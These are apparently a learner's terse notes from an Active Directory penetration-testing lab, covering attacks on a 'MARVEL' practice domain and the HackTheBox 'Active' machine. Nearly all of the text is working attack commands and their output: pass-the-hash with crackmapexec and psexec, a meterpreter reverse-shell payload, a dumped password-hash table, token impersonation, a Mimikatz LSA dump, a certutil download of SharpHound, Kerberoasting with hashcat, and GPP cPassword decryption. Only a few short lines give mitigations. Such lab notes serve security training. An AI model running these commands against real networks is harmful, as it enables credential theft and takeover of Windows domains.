crackmapexec smb 192.168.0.024 -u fcastle -d MARVEL -p Pa$$word

Win server (old)

msf6 exploit(windows/smb/psexec) > set smbdomain MARVEL.local

apt install crackmapexec

PASS THE HASH ALONG NETWORK

sysinfo
whoami
hashdump
error --
ps
migrate 976 (ctfmon.exe         x64   1        MARVEL\Administrator)
hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:88eae2ab60724c5947ad1790cb9aa5ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cf8a75a19984487991c5753075babb4e:::
tstark:1108:aad3b435b51404eeaad3b435b51404ee:472dd0d4b33dd140a638ed2bbeba17bf:::
marta:1110:aad3b435b51404eeaad3b435b51404ee:1a4b1757588cab6298e29e91c06df58d:::
SQLservice:1111:aad3b435b51404eeaad3b435b51404ee:7e449687caaf71367ad41ad9490f926d:::
fcastle:1115:aad3b435b51404eeaad3b435b51404ee:1a4b1757588cab6298e29e91c06df58d:::
HYDRA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:b419deaa2441750b0e1b17b0938382e4:::
THEPUNISHER$:1112:aad3b435b51404eeaad3b435b51404ee:b7765fc7a084594619f4b6031f7f09ef:::
MARTA$:1113:aad3b435b51404eeaad3b435b51404ee:7c0689fb4133297ce856b030147dbf28:::
THEPUNISHER2$:1114:aad3b435b51404eeaad3b435b51404ee:9f76e41124d234a7d001a240b71814b5:::

crackmapexec smb 192.168.0.0/24 -u fcastle -H 1a4b1757588cab6298e29e91c06df58d -p Pa$$word

crackmapexec smb 192.168.56.101 -u fcastle -H 1a4b1757588cab6298e29e91c06df58d -p Pa$$word --sam  


crack ::segundo hash

psexec.py marvel/fcastle:Pa$$word@192.168.56.101 (certo)

No password spray in DOMAINs. may lock account

DUMPING HASHES (on Pwn3d)

secretsdump.py marvel/fcastle:Pa$$word@192.168.0.10 

crackmapexec 192.168.0.0/24 -u "Frank Castle" -H secondhash

https://ptestmethod.readthedocs.io/en/latest/cme.html

psexec.py "fcastle":@192.168.0.31 -hashes aad3b435b51404eeaad3b435b51404ee:9f76e41124d234a7d001a240b71814b5

Mitigation: avoid reuse local admin password
disable guest and administrator accounts
limits administrators

strong password > 14
no common words
long sentences

privilege access management
rotate passwords

TOKEN IMPERSONATION

msf6 exploit(windows/smb/psexec) > set target 2
set payload windows/x64/meterpreter/reverse_tcp

meterpreter > migrate 1388
[*] Migrating from 4924 to 1388...
[*] Migration completed successfully.

OR rev2self


meterpreter > hashdump
sysinfo


meterpreter> load incognito
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1

Impersonation Tokens Available
========================================
No tokens available

impersonate_token marvel\\fcastle
shell
whoami

also, LSA dump
powershell -ep bypass
certutil -urlcache -f http://192.168.0.27/SharpHound.ps1 SharpHound.ps1
. .\SharpHound.ps1

load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
help kiwi
Invoke-Mimikatz -Command '"priviliege::debug" "LSADump::LSA /inject" exit' -Computer HYDRA.marvel.local
kerberos hash -> RID + NTLM + User: krbtgt

meterpreter > list_tokens -u


meterpreter > impersonate_token marvel\\administrator

MITIGATION FOR TOKEN IMPERSONATION

KERBEROASTING
https://medium.com/@Shorty420/kerberoasting-9108477279cc
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.py

┌──(root💀kali)-[/home/XX/impacket/examples]
└─# python GetUserSPNs.py MARVEL.local/fcastle:Pa$$word -dc-ip 192.168.0.28 -request

get TGS hash -> hashcat --help | grep Kerberos

hashcat -m 13100 hashes.txt rockyou.txt -o

MITIGATION
- stronh passwords
- least privilege

GPP (Group Policy Preferences) MS14-025 Attack / cPassword
HackTheBox - machine Active
get cPassword
gpp-decrypt

metasploit> smb/enum/gpp

cd Downloads
openvpn rubens_.openvpn
nmap -T4 -p- 10.10.10.100

ldap, ldpassl, kerberos = Domain Controller

Invoke -GPP can also be used

smbclient -L \\\\10.10.10.100\\
smbclient \\\\10.10.10.100\\Replication
prompt off
recurse on
mget *
(Groups.xml)

/home/theone/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>

gpp-decript edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
